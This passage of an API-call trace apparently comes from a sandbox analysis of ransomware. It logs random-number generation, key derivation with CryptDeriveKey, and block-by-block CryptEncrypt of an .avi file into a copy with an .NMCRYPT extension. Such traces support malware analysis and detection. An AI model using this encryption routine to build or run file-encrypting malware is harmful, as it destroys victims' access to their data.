(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.531] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.531] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.532] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0148.532] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.532] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad478) returned 1 [0148.532] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.532] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.532] wcslen (_String="\\\\?\\") returned 0x4 [0148.532] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad838) returned 1 [0148.532] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.532] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.532] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=48936) returned 1 [0148.532] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.533] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.610] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.610] GetLastError () returned 0x0 [0148.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.611] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.611] GetLastError () returned 0x0 [0148.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.611] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.611] GetLastError () returned 0x0 [0148.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.611] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.611] GetLastError () returned 0x0 [0148.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.611] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.611] GetLastError () returned 0x0 [0148.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.611] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.612] GetLastError () returned 0x0 [0148.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.612] GetLastError () returned 0x0 [0148.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.612] GetLastError () returned 0x0 [0148.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.612] GetLastError () returned 0x0 [0148.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.612] GetLastError () returned 0x0 [0148.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.612] GetLastError () returned 0x0 [0148.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.612] GetLastError () returned 0x0 [0148.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.613] GetLastError () returned 0x0 [0148.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.613] GetLastError () returned 0x0 [0148.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.613] GetLastError () returned 0x0 [0148.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.613] GetLastError () returned 0x0 [0148.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.639] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.639] GetLastError () returned 0x0 [0148.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.639] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.639] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.640] GetLastError () returned 0x0 [0148.640] WriteFile (in: hFile=0x588, 